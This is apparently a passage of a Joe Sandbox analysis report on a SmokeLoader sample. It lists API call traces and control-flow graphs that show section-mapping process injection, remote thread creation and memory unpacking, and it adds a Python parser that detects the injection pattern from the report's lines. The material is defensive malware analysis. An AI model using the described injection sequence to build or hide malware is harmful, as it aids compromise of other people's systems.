                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                                    Control-flow Graph for the function at 401534 (rendered image with executed / not-executed block colouring; basic-block edge list omitted). Calls into 4011a4 and 4016f6.
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                                    Control-flow Graph for the function at 401541 (rendered image with executed / not-executed block colouring; basic-block edge list omitted). Calls into 4011a4 and 4016f6.
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24
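The records for 4014db, 401529, 401534 and 401541 above (and 401545 below) all resolve to the same NtDuplicateObject / NtCreateSection / NtMapViewOfSection sequence, and the printed arguments tell the story. NtDuplicateObject runs with source and target process both printed as 000000FF and options 0x2 (DUPLICATE_SAME_ACCESS). The first NtCreateSection asks for SECTION_MAP_READ|SECTION_MAP_WRITE (0x06) with PAGE_READWRITE (0x04) and SEC_COMMIT (0x08000000); the second adds SECTION_MAP_EXECUTE (0x0E) with PAGE_EXECUTE_READWRITE (0x40). Each section is then mapped twice: once with the current-process pseudo-handle as a writable view (Win32Protect 0x04), and once with a run-time handle ("?") where the executable section's view is PAGE_EXECUTE_READ (0x20). Writing through the local view and executing the remote one is the section-mapping variant of process injection, which matches the report's "Maps a DLL or memory area into another process" signature and the RtlCreateUserThread call on the 402ffa graph. The Python below is an added example and not part of the Joe Sandbox report or the SmokeLoader sample: it parses lines in the report's own "APIs" format and flags a SEC_COMMIT section that is mapped both into the caller and into another process handle. It assumes that the plugin prints the `push -1` (NtCurrentProcess) immediate as 000000FF, so that value and FFFFFFFF are both treated as the current process; the sample input is the report's seven lines for 401529.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the seven "APIs" lines the report prints for the function at
# 0x401529, copied verbatim so the parser runs on the report's own line format.
SAMPLE = """\
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: 00401611"; the argument list
# and the ref are both optional (e.g. "• GetFocus.USER32 ref: 00418B91").
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

SEC_COMMIT = 0x08000000                       # AllocationAttributes: pagefile-backed section
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80  # any PAGE_EXECUTE* page protection
# Assumption: the IDA plugin prints "push -1" (NtCurrentProcess) as 000000FF, so both
# the byte form and the full dword form are treated as the current-process pseudo-handle.
CURRENT_PROCESS = {0xFF, 0xFFFFFFFF}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None stands for "?" (value only known at run time)
    ref: Optional[int]         # call-site address, when the report prints one


@dataclass
class SectionFinding:
    create_ref: Optional[int]       # call site of NtCreateSection
    section_protect: Optional[int]  # SectionPageProtection argument
    executable: bool                # section may back executable views
    views: List[Tuple[Optional[int], str, Optional[int]]]  # (ref, target, Win32Protect)


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        ref = int(m.group("ref"), 16) if m.group("ref") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, ref))
    return calls


def _target(handle: Optional[int]) -> str:
    return "current" if handle in CURRENT_PROCESS else "runtime handle"


def _emit(f: SectionFinding, out: List[SectionFinding]) -> None:
    # Only a section seen in both the caller and a run-time supplied process is a finding.
    if {"current", "runtime handle"} <= {t for _, t, _ in f.views}:
        out.append(f)


def find_section_injection(calls: List[ApiCall]) -> List[SectionFinding]:
    """Walk the calls in report order; for each SEC_COMMIT NtCreateSection collect the
    NtMapViewOfSection calls that follow it and report sections mapped both locally
    and into another process handle (the layout of section-mapping injection)."""
    findings: List[SectionFinding] = []
    cur: Optional[SectionFinding] = None
    for c in calls:
        if c.name == "NtCreateSection" and len(c.args) >= 6:
            if cur is not None:
                _emit(cur, findings)
            prot, attrs = c.args[4], c.args[5]
            cur = None
            if attrs is not None and attrs & SEC_COMMIT:
                cur = SectionFinding(c.ref, prot,
                                     bool(prot is not None and prot & PAGE_EXECUTE_ANY), [])
        elif c.name == "NtMapViewOfSection" and cur is not None and len(c.args) >= 10:
            cur.views.append((c.ref, _target(c.args[1]), c.args[9]))  # ProcessHandle, Win32Protect
    if cur is not None:
        _emit(cur, findings)
    return findings


def _hex(v: Optional[int]) -> str:
    return "?" if v is None else f"0x{v:X}"


if __name__ == "__main__":
    for f in find_section_injection(parse_api_lines(SAMPLE)):
        kind = "RWX section" if f.executable else "RW section"
        print(f"NtCreateSection @ {_hex(f.create_ref)}: {kind}, protect {_hex(f.section_protect)}")
        for ref, target, prot in f.views:
            print(f"    view @ {_hex(ref)} in {target:<14} Win32Protect {_hex(prot)}")
```

Run on the report's lines it yields two findings: the PAGE_READWRITE section from 00401611 mapped RW into both processes (a staging buffer), and the PAGE_EXECUTE_READWRITE section from 00401693 mapped RW locally and PAGE_EXECUTE_READ remotely, which is the view a remote thread would run. Because the static listing prints the remote handle as "?", the parser can only say the handle is not the caller's pseudo-handle; a dynamic trace with the resolved handle value would let it name the target process.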

                                                                                                                    Control-flow Graph for the function at 401545 (rendered image with executed / not-executed block colouring; basic-block edge list omitted). Calls into 4011a4 and 4016f6.
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 427 4015d5-4015ec NtDuplicateObject 419->427 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 427->418 429 4015f2-401616 NtCreateSection 427->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 436 40169e-4016a2 431->436 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 436->418 439 4016a8-4016c9 NtMapViewOfSection 436->439 437->431 439->418 441 4016cf-4016eb NtMapViewOfSection 439->441 441->418 442 4016f1 call 4016f6 441->442
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1921587553-0
                                                                                                                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 464 6804bf-6804d8 465 6804da-6804dc 464->465 466 6804de 465->466 467 6804e3-6804ef CreateToolhelp32Snapshot 465->467 466->467 468 6804ff-68050c Module32First 467->468 469 6804f1-6804f7 467->469 470 68050e-68050f call 68017e 468->470 471 680515-68051d 468->471 469->468 476 6804f9-6804fd 469->476 474 680514 470->474 474->471 476->465 476->468
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006804E7
                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00680507
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_67d000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3833638111-0
                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                    • Instruction ID: 0a94162f8ea40fd4552f0e6d09cce9a9bb0cee5f61274add8b36c88ff7ed7e41
                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                    • Instruction Fuzzy Hash: 7BF06232140714ABE7603AF5A88DAAE76EDAF49725F100A28E742921C0DAB0E8494B61

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 134 5e003c-5e0047 135 5e004c-5e0263 call 5e0a3f call 5e0e0f call 5e0d90 VirtualAlloc 134->135 136 5e0049 134->136 151 5e028b-5e0292 135->151 152 5e0265-5e0289 call 5e0a69 135->152 136->135 154 5e02a1-5e02b0 151->154 156 5e02ce-5e03c2 VirtualProtect call 5e0cce call 5e0ce7 152->156 154->156 157 5e02b2-5e02cc 154->157 163 5e03d1-5e03e0 156->163 157->154 164 5e0439-5e04b8 VirtualFree 163->164 165 5e03e2-5e0437 call 5e0ce7 163->165 167 5e04be-5e04cd 164->167 168 5e05f4-5e05fe 164->168 165->163 170 5e04d3-5e04dd 167->170 171 5e077f-5e0789 168->171 172 5e0604-5e060d 168->172 170->168 174 5e04e3-5e0505 170->174 175 5e078b-5e07a3 171->175 176 5e07a6-5e07b0 171->176 172->171 177 5e0613-5e0637 172->177 186 5e0517-5e0520 174->186 187 5e0507-5e0515 174->187 175->176 178 5e086e-5e08be LoadLibraryA 176->178 179 5e07b6-5e07cb 176->179 180 5e063e-5e0648 177->180 185 5e08c7-5e08f9 178->185 183 5e07d2-5e07d5 179->183 180->171 181 5e064e-5e065a 180->181 181->171 184 5e0660-5e066a 181->184 188 5e07d7-5e07e0 183->188 189 5e0824-5e0833 183->189 192 5e067a-5e0689 184->192 194 5e08fb-5e0901 185->194 195 5e0902-5e091d 185->195 196 5e0526-5e0547 186->196 187->196 190 5e07e4-5e0822 188->190 191 5e07e2 188->191 193 5e0839-5e083c 189->193 190->183 191->189 198 5e068f-5e06b2 192->198 199 5e0750-5e077a 192->199 193->178 200 5e083e-5e0847 193->200 194->195 197 5e054d-5e0550 196->197 201 5e0556-5e056b 197->201 202 5e05e0-5e05ef 197->202 203 5e06ef-5e06fc 198->203 204 5e06b4-5e06ed 198->204 199->180 205 5e084b-5e086c 200->205 206 5e0849 200->206 208 5e056f-5e057a 201->208 209 5e056d 201->209 202->170 210 5e06fe-5e0748 203->210 211 5e074b 203->211 204->203 205->193 206->178 212 5e057c-5e0599 208->212 213 5e059b-5e05bb 208->213 209->202 210->211 211->192 218 5e05bd-5e05db 212->218 213->218 218->197
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005E024D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                    • Instruction ID: 8d9f06940a44e2be45beeee2e4bbecad622b7844b54902dca0b4f5182f6b35db
                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                    • Instruction Fuzzy Hash: A9526874A00269DFDB64CF59C984BA8BBB1BF09304F1480D9E94DAB391DB70AE85DF14

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099061454-3916222277
                                                                                                                    • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                    • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                    • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                    • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 477 5e0e0f-5e0e24 SetErrorMode * 2 478 5e0e2b-5e0e2c 477->478 479 5e0e26 477->479 479->478
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,005E0223,?,?), ref: 005E0E19
                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,005E0223,?,?), ref: 005E0E1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                    • Instruction ID: cea14cca2211f37e0d6e011ac58af5d885f71300399aca2e74a7d4b784c7d1e3
                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                    • Instruction Fuzzy Hash: 0FD0123114512877D7002A95DC09BCD7F1CDF05B62F008421FB0DD9080C7B0994046E5

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 537 68017e-6801b8 call 680491 540 6801ba-6801ed VirtualAlloc call 68020b 537->540 541 680206 537->541 543 6801f2-680204 540->543 541->541 543->541
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006801CF
Memory Dump Source
• Source File: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_67d000_RmbF3635xY.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0

APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
